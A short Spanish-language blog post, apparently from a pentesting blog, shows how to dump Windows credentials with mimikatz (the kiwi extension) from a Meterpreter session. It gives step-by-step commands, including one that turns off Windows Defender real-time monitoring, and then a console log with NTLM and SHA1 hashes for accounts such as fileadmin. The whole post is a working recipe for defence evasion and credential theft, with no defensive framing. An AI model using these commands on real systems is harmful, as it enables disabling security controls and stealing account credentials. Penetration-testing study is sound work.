Como usar mimikatz con meterpreter

by | Apr 27, 2021 | Blog, Herramientas / tools

Este va a ser un post muy rápido de como usar mimikatz si ya eres admin.

  1. Activa “shell”
  2. Entra a “Powershell”
  3. desactiva el real time monitoring “Set-MpPreference -DisableRealtimeMonitoring $true”
  4. sal de la shell “exit¨
  5. empieza mimikatz “load kiwi”
  6. pide todas las credentiasl “creds_all”
C:\Windows\system32>powershell
powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Windows\system32> Set-MpPreference -DisableRealtimeMonitoring $true Set-MPPreference -DisableRealtimeMonitoring $true
PS C:\Windows\system32> exit
exit
C:\Windows\system32>^C Terminate channel 2? [y/N] y
meterpreter > load kiwi Loading extension kiwi...
.#####.
 .## ^ ##.
 ## / \ ##
 ## \ / ##
 '## v ##'
  '#####'
Success.
meterpreter
[+] Running as SYSTEM
[*] Retrieving
msv credentials
===============
all credentials
mimikatz 2.2.0 20191125 (x64/windows)
"A La Vie, A L'Amour" - (oe.eo)
/*** Benjamin DELPY `gentilkiwi` ( [email protected] )
> http://blog.gentilkiwi.com/mimikatz
Vincent LE TOUX ( [email protected] ) > http://pingcastle.com / http://mysmartlogon.com ***/
> creds_all
Domain NTLM SHA1 ------ ---- ----
Username
DPAPI
--------
-----
FILESRV$  6a6854d2e05cef0dbd936545d7696771
fd32da38ad7d4c424e73642987aac5826b3a11c6
fileadmin  ceab6425e23a2cd45bfd2a04bd84047a c3448fddbe000d689f2a6fc580dcb354a3d16f67 006209af8fc4bd917d6cdf7087bda3ea 
...